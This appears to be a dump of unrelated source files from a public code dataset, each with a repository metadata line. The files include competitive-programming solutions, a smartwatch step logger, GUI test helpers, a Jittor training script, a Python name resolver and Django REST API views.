self.test_loss_list.append(final_mse)
def random_sample(self,user_id,item_id,y,user_r_id, item_r_id, user_r_rate, item_r_rate,loss):
num = len(user_id)
np.random.seed(2019)
loss =np.array(loss).flatten()
probability = np.exp(loss)/sum(np.exp(loss))
#print("probability.shape:{}".format(probability.shape))
#print("probability length:{}".format(len(probability)))
#print(probability)
#print("num:{}".format(num))
sample_ratio = self.sample_ratio
#print("sample:{}".format(int(num * sample_ratio)))
index = np.random.choice(num,size=int(num*sample_ratio),replace=False,p = probability)
s_user_id = np.array(user_id)[index]
s_item_id = np.array(item_id)[index]
s_y = np.array(y)[index]
s_user_r_id = np.array(user_r_id)[index]
s_item_r_id = np.array(item_r_id)[index]
s_user_r_rate = np.array(user_r_rate)[index]
s_item_r_rate = np.array(item_r_rate)[index]
s_user_review = []
s_item_review = []
for i in range(int(num * sample_ratio)):
s_user_review.append(self.users_review[s_user_id[i][0]])
s_item_review.append(self.items_review[s_item_id[i][0]])
feed_dict = {
self.user_id: s_user_id,
self.item_id: s_item_id,
self.input_y: s_y,
self.user_review: s_user_review,
self.item_review: s_item_review,
self.user_commented_items_id: s_user_r_id,
self.user_commented_items_rate: s_user_r_rate,
self.item_commented_users_id: s_item_r_id,
self.item_commented_users_rate: s_item_r_rate
}
_, s_t_rmse = self.sess.run([self.total_optimizer, self.loss], feed_dict)
print( "s_t_rmse:{}".format(s_t_rmse))
| wiio12/ADMN | Model/ADMN.py | ADMN.py | py | 30,985 | python | en | code | 4 | github-code | 90 |
18541045409 | from itertools import accumulate
from collections import Counter
n=int(input())
a=list(map(int,input().split()))
a=[0]+a
A=list(accumulate(a))
B=Counter(A)
ans=0
for i in B:
ans=ans+int((B[i]*(B[i]-1)/2))
print(ans) | Aasthaengg/IBMdataset | Python_codes/p03363/s863473237.py | s863473237.py | py | 217 | python | en | code | 0 | github-code | 90 |
23045412671 | '''
923. 3Sum With Multiplicity
Medium
Given an integer array arr, and an integer target, return the number of tuples i, j, k such that i < j < k and arr[i] + arr[j] + arr[k] == target.
As the answer can be very large, return it modulo 109 + 7.
Example 1:
Input: arr = [1,1,2,2,3,3,4,4,5,5], target = 8
Output: 20
Explanation:
Enumerating by the values (arr[i], arr[j], arr[k]):
(1, 2, 5) occurs 8 times;
(1, 3, 4) occurs 8 times;
(2, 2, 4) occurs 2 times;
(2, 3, 3) occurs 2 times.
https://leetcode.com/problems/3sum-with-multiplicity/
'''
class Solution:
def threeSumMulti(self, arr: List[int], target: int) -> int:
retVal = 0
l2 = collections.defaultdict(int)
for i in range(2, len(arr)):
#print(l2)
for j in range(i-1):
l2[arr[j] + arr[i-1]] += 1
retVal = retVal + l2[target - arr[i]]
retVal = retVal % (10**9 + 7)
return retVal
| aditya-doshatti/Leetcode | 3sum_with_multiplicity_923.py | 3sum_with_multiplicity_923.py | py | 942 | python | en | code | 0 | github-code | 90 |
18558931219 |
N,K = map(int,input().split())
ans = 0
for b in range(K+1,N+1):
tmp = 0
multi = int(N/b)
tmp += (b-K) * multi
if K==0:
tmp += max(0,N%b)
else:
tmp += max(0,(N%b-K+1))
ans += tmp
print(ans) | Aasthaengg/IBMdataset | Python_codes/p03418/s014451154.py | s014451154.py | py | 230 | python | en | code | 0 | github-code | 90 |
16543319519 | import array
import os
import time
import wasp
from micropython import const
TICK_PERIOD = const(6 * 60)
DUMP_LENGTH = const(30)
DUMP_PERIOD = const(DUMP_LENGTH * TICK_PERIOD)
class StepIterator:
def __init__(self, fname, data=None):
self._fname = fname
self._f = None
self._d = data
def __del__(self):
self.close()
def __iter__(self):
self.close()
self._f = open(self._fname, 'rb')
self._c = 0
return self
def __next__(self):
self._c += 1
if self._c > (24*60*60) // TICK_PERIOD:
raise StopIteration
if self._f:
spl = self._f.read(2)
if spl:
return spl[0] + (spl[1] << 8)
self.close()
self._i = 0
if self._d and self._i < len(self._d):
i = self._i
self._i += 1
return self._d[i]
return 0
def close(self):
if self._f:
self._f.close()
self._f = None
class StepLogger:
def __init__(self, manager):
self._data = array.array('H', (0,) * DUMP_LENGTH)
self._steps = wasp.watch.accel.steps
try:
os.mkdir('logs')
except:
pass
# Queue a tick
self._t = int(wasp.watch.rtc.time()) // TICK_PERIOD * TICK_PERIOD
manager.set_alarm(self._t + TICK_PERIOD, self._tick)
def _tick(self):
"""Capture the current step count in N minute intervals.
The samples are queued in a small RAM buffer in order to reduce
the number of flash access. The data is written out every few hours
in a binary format ready to be reloaded and graphed when it is
needed.
"""
t = self._t
# Work out where we are in the dump period
i = t % DUMP_PERIOD // TICK_PERIOD
# Get the current step count and record it
steps = wasp.watch.accel.steps
self._data[i] = steps - self._steps
self._steps = steps
# Queue the next tick
wasp.system.set_alarm(t + TICK_PERIOD, self._tick)
self._t += TICK_PERIOD
if i < (DUMP_LENGTH-1):
return
# Record the data in the flash
walltime = time.localtime(t)
yyyy = walltime[0]
mm = walltime[1]
dd = walltime[2]
# Find when (in seconds) "today" started
then = int(time.mktime((yyyy, mm, dd, 0, 0, 0, 0, 0, 0)))
elapsed = t - then
# Work out how dumps we expect to find in today's dumpfile
dump_num = elapsed // DUMP_PERIOD
# Update the log data
try:
os.mkdir('logs/' + str(yyyy))
except:
pass
fname = 'logs/{}/{:02d}-{:02d}.steps'.format(yyyy, mm, dd)
offset = dump_num * DUMP_LENGTH * 2
try:
sz = os.stat(fname)[6]
except:
sz = 0
f = open(fname, 'ab')
# This is a portable (between real Python and MicroPython) way to
# grow the file to the right size.
f.seek(min(sz, offset))
for _ in range(sz, offset, 2):
f.write(b'\x00\x00')
f.write(self._data)
f.close()
# Wipe the data
data = self._data
for i in range(DUMP_LENGTH):
data[i] = 0
def data(self, t):
try:
yyyy = t[0]
except:
t = time.localtime(t)
yyyy = t[0]
mm = t[1]
dd = t[2]
fname = 'logs/{}/{:02d}-{:02d}.steps'.format(yyyy, mm, dd)
try:
os.stat(fname)
except:
return None
# Record the data in the flash
now = time.localtime(self._t)
if now[:3] == t[:3]:
latest = self._data
# Work out where we are in the dump period and update
# with the latest counts
i = self._t % DUMP_PERIOD // TICK_PERIOD
latest[i] = wasp.watch.accel.steps - self._steps
else:
latest = None
return StepIterator(fname, latest)
| wasp-os/wasp-os | wasp/steplogger.py | steplogger.py | py | 4,091 | python | en | code | 752 | github-code | 90 |
5909488510 | source(findFile("scripts", "dawn_global_startup.py"))
source(findFile("scripts", "dawn_global_plot_tests.py"))
source(findFile("scripts", "swt_treeitems.py"))
source(findFile("scripts", "dawn_global_ui_controls.py"))
# Start Function fitting on metalmix.mca
def startFunctionFitting():
#Start using clean workspace
startOrAttachToDAWN()
# Open data browsing perspective
openPerspective("Data Browsing")
#expand data tree and open metal mix
expand(waitForObjectItem(":Project Explorer_Tree", "data"))
expand(waitForObjectItem(":Project Explorer_Tree", "examples"))
children = object.children(waitForObjectItem(":Project Explorer_Tree", "examples"))
for child in children:
if "metalmix.mca" in child.text:
doubleClick(child)
continue
if(isEclipse4()):
mouseClick(waitForObjectItem(":Data_Table_3", "0/0"), 12, 6, 0, Button.Button1)
else:
mouseClick(waitForObjectItem(":Data_Table", "0/0"), 12, 6, 0, Button.Button1)
snooze(1)
# start function fitting
if(isEclipse4()):
mouseClick(waitForObject(":XY plotting tools_ToolItem_3"), 28, 14, 0, Button.Button1)
else:
mouseClick(waitForObject(":XY plotting tools_ToolItem_2"), 28, 14, 0, Button.Button1)
activateItem(waitForObjectItem(":Pop Up Menu", "Maths and Fitting"))
if(isEclipse4()):
activateItem(waitForObjectItem(":Maths and Fitting_Menu_2", "Function Fitting"))
else:
activateItem(waitForObjectItem(":Maths and Fitting_Menu", "Function Fitting"))
def setFunctionFittingRegion(regionStart, regionLength):
if(isEclipse4()):
mouseClick(waitForObject(":Configure Settings..._ToolItem_4"), 8, 13, 0, Button.Button1)
else:
mouseClick(waitForObject(":Configure Settings..._ToolItem_3"), 12, 16, 0, Button.Button1)
clickTab(waitForObject(":Configure Graph Settings.Regions_TabItem"))
mouseClick(waitForObjectItem(":Regions.Region Location_Table", "0/1"))
mouseClick(waitForObjectItem(":Regions.Region Location_Table", "0/1"), 34, 16, 0, Button.Button1)
type(waitForObject(":Regions_Text"), "<Ctrl+a>")
type(waitForObject(":Regions_Text"), str(regionStart))
type(waitForObject(":Regions_Text"), "<Return>")
mouseClick(waitForObjectItem(":Regions.Region Location_Table", "1/1"))
mouseClick(waitForObjectItem(":Regions.Region Location_Table", "1/1"), 64, 2, 0, Button.Button1)
type(waitForObject(":Regions_Text"), "<Ctrl+a>")
type(waitForObject(":Regions_Text"), str(regionLength))
type(waitForObject(":Regions_Text"), "<Numpad Return>")
clickButton(waitForObject(":Configure Graph Settings.OK_Button"))
def insertFunction(functionName):
clickTab(waitForObject(":Function Fitting_CTabItem"))
type(waitForObject(":Function Fitting_Tree"), "<Insert>")
type(waitForObject(":Function Fitting_Text"), str(functionName))
type(waitForObject(":Function Fitting_Text"), "<Return>")
type(waitForObject(":Function Fitting_Text"), "<Return>")
# Set the field on the given path
# path is passed to get_swt_tree_item to get the treeitem, see help for that
# field is one of below constants (i.e. column number)
# value is new value to put in field
FUNCTION_COL=0
VALUE_COL=1
LOWER_LIMIT_COL=2
UPPER_LIMIT_COL=3
FITTED_PARAMETERS_COL=4
def setField(path, column, value):
subitem = get_swt_tree_sub_item(waitForObject(":Function Fitting_Tree"), path, column)
mouseClick(subitem)
type(waitForObject(":Function Fitting_Text"), str(value))
type(waitForObject(":Function Fitting_Text"), "<Return>")
# Get the field value of the specified path and column
# See setField for use of path/column argument
def getField(path, column):
subitem = get_swt_tree_sub_item(waitForObject(":Function Fitting_Tree"), path, column)
return subitem.text
| DawnScience/dawn-test | org.dawnsci.squishtests/suite_tools1d_functionfitting/shared/scripts/function_fitting_common.py | function_fitting_common.py | py | 3,880 | python | en | code | 3 | github-code | 90 |
5423634237 | import jittor as jt
import jittor.nn as nn
from dataset import TsinghuaDog
from jittor import transform
from jittor.optim import Adam, SGD
from tqdm import tqdm
import numpy as np
from model import Net
import argparse
jt.flags.use_cuda=1
def train(model, train_loader, optimizer, epoch):
model.train()
total_acc = 0
total_num = 0
losses = 0.0
pbar = tqdm(train_loader, desc=f'Epoch {epoch} [TRAIN]')
for images, labels in pbar:
output = model(images)
loss = nn.cross_entropy_loss(output, labels)
optimizer.step(loss)
pred = np.argmax(output.data, axis=1)
acc = np.mean(pred == labels.data) * 100
total_acc += acc
total_num += labels.shape[0]
losses += loss
pbar.set_description(f'Epoch {epoch} [TRAIN] loss = {loss.data[0]:.2f}, acc = {acc:.2f}')
best_acc = -1.0
def evaluate(model, val_loader, epoch=0, save_path='./best_model.pkl'):
model.eval()
global best_acc
total_acc = 0
total_num = 0
for images, labels in val_loader:
output = model(images)
pred = np.argmax(output.data, axis=1)
acc = np.sum(pred == labels.data)
total_acc += acc
total_num += labels.shape[0]
acc = total_acc / total_num
if acc > best_acc:
best_acc = acc
model.save(save_path)
print ('Test in epoch', epoch, 'Accuracy is', acc, 'Best accuracy is', best_acc)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--batch_size', type=int, default=8)
parser.add_argument('--epochs', type=int, default=50)
parser.add_argument('--num_classes', type=int, default=130)
parser.add_argument('--lr', type=float, default=2e-3)
parser.add_argument('--weight_decay', type=float, default=1e-5)
parser.add_argument('--resume', type=bool, default=False)
parser.add_argument('--eval', type=bool, default=False)
parser.add_argument('--dataroot', type=str, default='/home/gmh/dataset/TsinghuaDog/')
parser.add_argument('--model_path', type=str, default='./best_model.pkl')
args = parser.parse_args()
transform_train = transform.Compose([
transform.Resize((512, 512)),
transform.RandomCrop(448),
transform.RandomHorizontalFlip(),
transform.ToTensor(),
transform.ImageNormalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),
])
root_dir = args.dataroot
train_loader = TsinghuaDog(root_dir, batch_size=16, train=True, part='train', shuffle=True, transform=transform_train)
transform_test = transform.Compose([
transform.Resize((512, 512)),
transform.CenterCrop(448),
transform.ToTensor(),
transform.ImageNormalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),
])
val_loader = TsinghuaDog(root_dir, batch_size=16, train=False, part='val', shuffle=False, transform=transform_test)
epochs = args.epochs
model = Net(num_classes=args.num_classes)
lr = args.lr
weight_decay = args.weight_decay
optimizer = SGD(model.parameters(), lr=lr, momentum=0.9)
if args.resume:
model.load(args.model_path)
if args.eval:
evaluate(model, val_loader)
return
for epoch in range(epochs):
train(model, train_loader, optimizer, epoch)
evaluate(model, val_loader, epoch)
if __name__ == '__main__':
main()
| Jittor/TsinghuaDogBaseline | main.py | main.py | py | 3,388 | python | en | code | 9 | github-code | 90 |
18331868319 | N=int(input())
L=list(map(int,input().split()))
L = sorted(L)
def binary_search(func, array, left=0):
right=len(array)-1
y_left, y_right = func(array[left]), func(array[right])
if y_left==False:return 0
while True:
middle = (left+right)//2
y_middle = func(array[middle])
if y_left==y_middle: left=middle
else: right=middle
if right-left==1:break
return left
SUM = 0
for i in range(N-2):
for j in range(i+1,N-1):
l = L[i]+L[j]
if L[-1]<l:
k = N-1
else:
k = binary_search(lambda x: x<l, L, j+1)
SUM += max(0,k-j)
print(SUM) | Aasthaengg/IBMdataset | Python_codes/p02888/s638158726.py | s638158726.py | py | 615 | python | en | code | 0 | github-code | 90 |
34361093960 | #documentation and comments for the main and create random array can be found in the mergeTime program
import random
import time
def createRanArray(n):
randArr = [None] * n
for i in range(0, n):
randArr[i] = random.randrange(10001)
return randArr
#Insert sort function takes in an array and sorts it
#iterates through the array and moves the values up to their propper spot
def insertSort(arr=None):
for i in range(1, len(arr)):
k = i #start at index 1 instead of 0 since index 0 will not be compared with anything before it
while(k > 0): #iterates through all the values before it
buf = 0
if(arr[k-1] > arr[k]): #swap the values if the one before is larger than the one after
buf = arr[k-1]
arr[k-1] = arr[k]
arr[k] = buf
k = k - 1 #iterates through all the valus before the one we are starting with
return
def main():
random.seed()
insertSortTimes = [None] * 10
curTime = 0
n = 3000
arrSizes = [5000, 7000, 10000, 12000, 13000, 15000, 17000, 18000]
tempArr = createRanArray(100)
print(tempArr)
insertSort(tempArr)
print(tempArr)
for i in range(0, 10):
curTime = time.clock()
insertSort(createRanArray(n))
insertSortTimes[i] = (time.clock() - curTime)
print(n, insertSortTimes[i])
n = n + 2000
main()
| jwright303/Algorithm-Analysis | SortingAlgorithms/insertTime.py | insertTime.py | py | 1,266 | python | en | code | 0 | github-code | 90 |
1303597880 | # Create an empty adjacency list for each node in the graph
graph = {}
num_nodes = int(input("Enter number of nodes: "))
for node in range(num_nodes):
graph[node] = []
# Add each edge to the adjacency list of its source and destination nodes
num_edges = int(input("Enter number of edges: "))
for i in range(num_edges):
u, v = input(f"Enter edge {i+1} (source destination): ").split()
u = int(u)
v = int(v)
graph[u].append(v)
graph[v].append(u)
# Create an empty list to keep track of visited nodes
visited = []
# Define a recursive function to perform DFS
def dfs(node):
# Print the current node
print(node, end=" ")
# Visit each neighbor of the current node that hasn't been visited yet
for neighbor in graph[node]:
if neighbor not in visited:
visited.append(neighbor)
dfs(neighbor)
# Start the DFS from node 0
visited.append(0)
dfs(0)
# Enter number of nodes: 6
# Enter number of edges: 6
# 0 1
# 0 2
# 1 3
# 1 4
# 2 5
# 4 5
# 0 1 3 4 5 2 | KunalNathani/prax | p_dfs.py | p_dfs.py | py | 1,027 | python | en | code | 0 | github-code | 90 |
72676095338 | from math import ceil
avg_speed = float(input())
gas_for_100km = float(input())
total_1 = 384400 * 2
total = ceil(total_1 / avg_speed)
total += 3
fuel = (gas_for_100km * total_1) / 100
print(total)
print(f'{fuel:.0f}')
| Yani-Jivkov/Basic-Python-Exams | EXAM2/2.1.py | 2.1.py | py | 238 | python | en | code | 0 | github-code | 90 |
73904907175 | '''
Prompt #1
Clusters of Activity
# # Problem Link: https://repl.it/student/submissions/9814047
# Write a function that accepts a 2D plane as a dictionary. The dictionary represents a segment of a map, and it contains map coordinates as keys, and a count of outbreaks in the area as values. The map may be huge, which is why we're using a dictionary(because most of the map will be 0s otherwise.)
# Find the center of the outbreak. The center is defined as the average of all points, but treat each case as one data point(eg, if there are 10 reports in one location, add that location to the average 10 times). Round to the nearest integer values, but return as a string: "x,y".
Example Data:
reported_outbreak = {
"5,5": 10,
"5,6": 8,
"5,4": 8,
"4,5": 8,
"4,5": 8,
"4,6": 8,
"6,6": 7,
"6,5": 8,
"4,4": 8,
"3,4": 4,
"3,3": 2,
"6,7": 2
}
'''
def find_center(matrix):
avg_x = 0
avg_y = 0
total_cases = 0
for coords, cases in matrix.items():
while cases > 0:
total_cases += 1
cases -= 1
print(coord)
x, y = coords.split(" , ")
avg_x += x
avg_y += y
avg_x = avg_x / total_cases
avg_y = avg_y / total_cases
return avg_x, avg_y
reported_outbreak = {
"5,5": 10,
"5,6": 8,
"5,4": 8,
"4,5": 8,
"4,5": 8,
"4,6": 8,
"6,6": 7,
"6,5": 8,
"4,4": 8,
"3,4": 4,
"3,3": 2,
"6,7": 2
}
print(find_center(reported_outbreak))
'''
Prompt 2:
Natural Language Calculator
You are working on a very small part of a natural language processing engine. You want your engine to be able to respond to math properly. Your colleagues have written a program that can identify when a user is asking a math question, but they haven't written a calculator!
Your job is to create a calculator that will parse natural language, and speak in natural language. To simplify the problem, you will only ever receive two operands, and all operands will be under one hundred.
Given a statement like:
"add two and seven"
return "nine".
"subtract six from four"
return "negative two"
To help with this, recognize that dictionaries can hold any value, including functions!
'''
def nlp_calculator(statement):
commands = statement.split(" ")
# translate the command into a function
func = translator.get(commands[0])
# print(f"Commands:{commands}")
first_number = translator.get(commands[1])
second_number = translator.get(commands[3])
# print(f"first_number: {first_number }, second_number: {second_number} ")
result = func(second_number, first_number)
# print(f"result:{result}")
transalted_result = translator.get(result)
# print(f"transalted_result:{transalted_result}")
return transalted_result
# return ""
def add(a, b):
return a + b
def subtract(a, b):
return a - b
translator = {
"add": add,
"subtract": subtract,
"one": 1,
"two": 2,
"three": 3,
"four": 4,
"five": 5,
"six": 6,
"seven": 7,
"eight": 8,
"nine": 9,
1: "one",
2: "two",
3: "three",
4: "four",
5: "five",
6: "six",
7: "seven",
8: "eight",
9: "nine",
-2: "negative two"
}
test1 = "add two and seven"
test2 = "subtract six from four"
print(nlp_calculator(test1))
# print(nlp_calculator(test2))
| campbellmarianna/Code-Challenges | python/abcs_course_remote/mod_9_prob.py | mod_9_prob.py | py | 3,299 | python | en | code | 0 | github-code | 90 |
70779174058 | import yaml
import sys
import os
with open("settings.conf", "r") as ymlfile:
cfg = yaml.full_load(ymlfile)
courses_downloaded = []
with open(cfg["save_location"] + "course_list.txt", "r") as f:
for line in f:
course = line[:-1]
courses_downloaded.append(course)
for i in range(len(courses_downloaded)):
course_name = courses_downloaded[i]
old_name = cfg["save_location"] + 'course_files_export (' + str(i) + ').zip'
if(i == 0):
old_name = cfg["save_location"] + "course_files_export.zip"
new_name = cfg["save_location"] + str(course_name) + '.zip'
os.rename(old_name, new_name)
| colbyjanecka/canvas-scraper | rename_folders.py | rename_folders.py | py | 632 | python | en | code | 0 | github-code | 90 |
33702652057 | # 문제 : 색칠하기
# 어린 토니킴은 색칠공부를 좋아한다.
# 토니킴은 먼저 여러 동그라미와 동그라미 두 개를 연결하는 직선들 만으로 그림을 그리고 (모든 동그라미들 사이에 직선이 있을 필요는 없다),
# 연결된 두 동그라미는 서로 색이 다르게 되도록 색을 칠하고자 한다.
# 이 그림을 색칠하는데 필요한 최소의 색의 개수를 구하는 문제는 어렵기 때문에 토니킴은 2 가지 색상으로 색칠이 가능한지의 여부만을 알고 싶어한다.
# 동그라미들의 번호와 동그라미들이 서로 연결된 직선에 대한 정보가 주어졌을 때, 이 동그라미들이 2 가지 색상으로 색칠이 가능한지 알아내자.
import sys
def dfs(x,pre_value):
global flag
if vis[x] == 0:
vis[x] = pre_value
for i in graph[x]:
dfs(i,3-pre_value)
else:
if vis[x] != pre_value:
flag = False
return
for i in range(int(input())):
n,m = map(int,input().split())
graph = [[] for _ in range(n+1)]
vis = [0 for _ in range(n+1)]
for j in range(m):
x,y = map(int,input().split())
graph[x].append(y)
graph[y].append(x)
flag = True
for k in range(1,n+1):
if vis[k] == 0:
dfs(k,1)
print("possible" if flag else"impossible")
| kimujinu/python_PS | 13265.py | 13265.py | py | 1,389 | python | ko | code | 0 | github-code | 90 |
18535829499 | import sys
sys.setrecursionlimit(10 ** 6)
def dfs(s, pos):
global N, K
ns = {}
if len(A) > K:
return
for i in pos:
ni = i + 1
if ni < N:
x = s + S[ni]
if x in ns:
ns[x].append(ni)
else:
ns[x] = [ni]
candidate = []
for x in list(ns.keys()):
candidate.append((x, ns[x]))
candidate.sort()
for c, idx in candidate:
A.add(c)
dfs(c, idx)
S = list(input())
N = len(S)
K = int(input())
alpha = [chr(ord('a') + i) for i in range(26)]
A = set()
for c in alpha:
if len(A) < K:
pos = []
for i, s in enumerate(S):
if c == s:
A.add(c)
pos.append(i)
dfs(c, pos)
A = list(A)
A.sort()
print(A[K - 1])
| Aasthaengg/IBMdataset | Python_codes/p03353/s380139072.py | s380139072.py | py | 810 | python | en | code | 0 | github-code | 90 |
9275603948 | import os
import pkg_resources
import sys
import imp
ignore_types = [imp.C_EXTENSION, imp.C_BUILTIN]
init_names = ['__init__%s' % x[0] for x in imp.get_suffixes() if
x[0] and x[2] not in ignore_types]
def caller_path(path, level=2):
if not os.path.isabs(path):
module = caller_module(level + 1)
prefix = package_path(module)
path = os.path.join(prefix, path)
return path
def caller_module(level=2, sys=sys):
module_globals = sys._getframe(level).f_globals
module_name = module_globals.get('__name__') or '__main__'
module = sys.modules[module_name]
return module
def package_name(pkg_or_module):
""" If this function is passed a module, return the dotted Python
package name of the package in which the module lives. If this
function is passed a package, return the dotted Python package
name of the package itself."""
if pkg_or_module is None or pkg_or_module.__name__ == '__main__':
return '__main__'
pkg_filename = pkg_or_module.__file__
pkg_name = pkg_or_module.__name__
splitted = os.path.split(pkg_filename)
if splitted[-1] in init_names:
# it's a package
return pkg_name
return pkg_name.rsplit('.', 1)[0]
def package_of(pkg_or_module):
""" Return the package of a module or return the package itself """
pkg_name = package_name(pkg_or_module)
__import__(pkg_name)
return sys.modules[pkg_name]
def caller_package(level=2, caller_module=caller_module):
# caller_module in arglist for tests
module = caller_module(level + 1)
f = getattr(module, '__file__', '')
if (('__init__.py' in f) or ('__init__$py' in f)): # empty at >>>
# Module is a package
return module
# Go up one level to get package
package_name = module.__name__.rsplit('.', 1)[0]
return sys.modules[package_name]
def package_path(package):
# computing the abspath is actually kinda expensive so we memoize
# the result
prefix = getattr(package, '__abspath__', None)
if prefix is None:
prefix = pkg_resources.resource_filename(package.__name__, '')
# pkg_resources doesn't care whether we feed it a package
# name or a module name within the package, the result
# will be the same: a directory name to the package itself
try:
package.__abspath__ = prefix
except:
# this is only an optimization, ignore any error
pass
return prefix
class _CALLER_PACKAGE(object):
def __repr__(self): # pragma: no cover (for docs)
return 'pyramid.path.CALLER_PACKAGE'
CALLER_PACKAGE = _CALLER_PACKAGE()
class Resolver(object):
def __init__(self, package=CALLER_PACKAGE):
if package in (None, CALLER_PACKAGE):
self.package = package
else:
if isinstance(package, basestring):
try:
__import__(package)
except ImportError:
raise ValueError(
'The dotted name %r cannot be imported' % (package,)
)
package = sys.modules[package]
self.package = package_of(package)
def get_package_name(self):
if self.package is CALLER_PACKAGE:
package_name = caller_package().__name__
else:
package_name = self.package.__name__
return package_name
def get_package(self):
if self.package is CALLER_PACKAGE:
package = caller_package()
else:
package = self.package
return package
class DottedNameResolver(Resolver):
""" A class used to resolve a :term:`dotted Python name` to a package or
module object.
.. note:: This API is new as of Pyramid 1.3.
The constructor accepts a single argument named ``package`` which may be
any of:
- A fully qualified (not relative) dotted name to a module or package
- a Python module or package object
- The value ``None``
- The constant value :attr:`pyramid.path.CALLER_PACKAGE`.
The default value is :attr:`pyramid.path.CALLER_PACKAGE`.
The ``package`` is used when a relative dotted name is supplied to the
:meth:`~pyramid.path.DottedNameResolver.resolve` method. A dotted name
which has a ``.`` (dot) or ``:`` (colon) as its first character is
treated as relative.
If the value ``None`` is supplied as the ``package``, the resolver will
only be able to resolve fully qualified (not relative) names. Any
attempt to resolve a relative name when the ``package`` is ``None`` will
result in an :exc:`ValueError` exception.
If the value :attr:`pyramid.path.CALLER_PACKAGE` is supplied as the
``package``, the resolver will treat relative dotted names as relative to
the caller of the :meth:`~pyramid.path.DottedNameResolver.resolve`
method.
If a *module* or *module name* (as opposed to a package or package name)
is supplied as ``package``, its containing package is computed and this
package used to derive the package name (all names are resolved relative
to packages, never to modules). For example, if the ``package`` argument
to this type was passed the string ``xml.dom.expatbuilder``, and
``.mindom`` is supplied to the
:meth:`~pyramid.path.DottedNameResolver.resolve` method, the resulting
import would be for ``xml.minidom``, because ``xml.dom.expatbuilder`` is
a module object, not a package object.
If a *package* or *package name* (as opposed to a module or module name)
is supplied as ``package``, this package will be used to relative compute
dotted names. For example, if the ``package`` argument to this type was
passed the string ``xml.dom``, and ``.minidom`` is supplied to the
:meth:`~pyramid.path.DottedNameResolver.resolve` method, the resulting
import would be for ``xml.minidom``.
"""
def resolve(self, dotted):
"""
This method resolves a dotted name reference to a global Python
object (an object which can be imported) to the object itself.
Two dotted name styles are supported:
- ``pkg_resources``-style dotted names where non-module attributes
of a package are separated from the rest of the path using a ``:``
e.g. ``package.module:attr``.
- ``zope.dottedname``-style dotted names where non-module
attributes of a package are separated from the rest of the path
using a ``.`` e.g. ``package.module.attr``.
These styles can be used interchangeably. If the supplied name
contains a ``:`` (colon), the ``pkg_resources`` resolution
mechanism will be chosen, otherwise the ``zope.dottedname``
resolution mechanism will be chosen.
If the ``dotted`` argument passed to this method is not a string, a
:exc:`ValueError` will be raised.
When a dotted name cannot be resolved, a :exc:`ValueError` error is
raised.
Example:
.. code-block:: python
r = DottedNameResolver()
v = r.resolve('xml') # v is the xml module
"""
if not isinstance(dotted, basestring):
raise ValueError('%r is not a string' % (dotted,))
package = self.package
if package is CALLER_PACKAGE:
package = caller_package()
return self._resolve(dotted, package)
def maybe_resolve(self, dotted):
"""
This method behaves just like
:meth:`~pyramid.path.DottedNameResolver.resolve`, except if the
``dotted`` value passed is not a string, it is simply returned. For
example:
.. code-block:: python
import xml
r = DottedNameResolver()
v = r.maybe_resolve(xml)
# v is the xml module; no exception raised
"""
if isinstance(dotted, basestring):
package = self.package
if package is CALLER_PACKAGE:
package = caller_package()
return self._resolve(dotted, package)
return dotted
def _resolve(self, dotted, package):
if ':' in dotted:
return self._pkg_resources_style(dotted, package)
else:
return self._zope_dottedname_style(dotted, package)
def _pkg_resources_style(self, value, package):
""" package.module:attr style """
if value.startswith('.') or value.startswith(':'):
if not package:
raise ValueError(
'relative name %r irresolveable without package' % (value,)
)
if value in ['.', ':']:
value = package.__name__
else:
value = package.__name__ + value
return pkg_resources.EntryPoint.parse(
'x=%s' % value).load(False)
def _zope_dottedname_style(self, value, package):
""" package.module.attr style """
module = getattr(package, '__name__', None) # package may be None
if not module:
module = None
if value == '.':
if module is None:
raise ValueError(
'relative name %r irresolveable without package' % (value,)
)
name = module.split('.')
else:
name = value.split('.')
if not name[0]:
if module is None:
raise ValueError(
'relative name %r irresolveable without '
'package' % (value,)
)
module = module.split('.')
name.pop(0)
while not name[0]:
module.pop()
name.pop(0)
name = module + name
used = name.pop(0)
found = __import__(used)
for n in name:
used += '.' + n
try:
found = getattr(found, n)
except AttributeError:
__import__(used)
found = getattr(found, n) # pragma: no cover
return found
def resolve_name(name, package=None):
"""Resolve dotted name into a python object.
This function resolves a dotted name as a reference to a python object,
returning whatever object happens to live at that path. It's a simple
convenience wrapper around pyramid's DottedNameResolver.
The optional argument 'package' specifies the package name for relative
imports. If not specified, only absolute paths will be supported.
"""
return DottedNameResolver(package).resolve(name)
| mozilla-services/metlog-py | metlog/path.py | path.py | py | 10,676 | python | en | code | 37 | github-code | 90 |
548197620 | from django.shortcuts import render,get_object_or_404,redirect
from django.contrib.auth.decorators import login_required
from .models import Profile,Project
from .forms import PostProject,UpdateUser,UpdateProfile,Votes
from django.contrib.auth.models import User
from rest_framework.views import APIView
from rest_framework.response import Response
from .serializers import ProjectSerailizer,UserSerializer
from rest_framework import status
from .permission import IsAdminOrReadOnly
from django.http import HttpResponseRedirect
from django.urls import reverse
from django.contrib import messages
import numpy as np
# Create your views here.
class ProjectList(APIView):
def get(self,response,format=None):
projects=Project.objects.all()
serializer=ProjectSerailizer(projects,many=True)
return Response(serializer.data)
@login_required
def post(self,request,format=None):
permission_classes=(IsAdminOrReadOnly,)
serializer=ProjectSerailizer(data=request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data,status=status.HTTP_201_CREATED)
return Response(serializer.errors,status=status.HTTP_400_BAD_REQUEST)
permission_classes=(IsAdminOrReadOnly,)
class UserList(APIView):
def get(self,response,format=None):
users=User.objects.all()
serializer=UserSerializer(users,many=True)
return Response(serializer.data)
#GETS A PROJECT BY AN ID
class ProjectDescription(APIView):
permission_classes=(IsAdminOrReadOnly,)
def get_project(self,pk):
return get_object_or_404(Project,pk=pk)
#gets project by id
def get(self, request, pk ,format=None):
project= self.get_project(pk)
serializer=ProjectSerailizer(project)
return Response(serializer.data)
#updates a specific project
def put(self, request,pk, format=None):
project=self.get_project(pk)
serializer=ProjectSerailizer(project,request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data)
else:
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
#DELETES A PROJECT
def delete(self,request,pk,format=None):
project=self.get_project(pk)
project.delete()
return Response(status=status.HTTP_204_NO_CONTENT)
#GETS USER BY ID
class UserDescription(APIView):
permission_classes=(IsAdminOrReadOnly,)
def get_user(self,pk):
return get_object_or_404(User,pk=pk)
#gets user by id
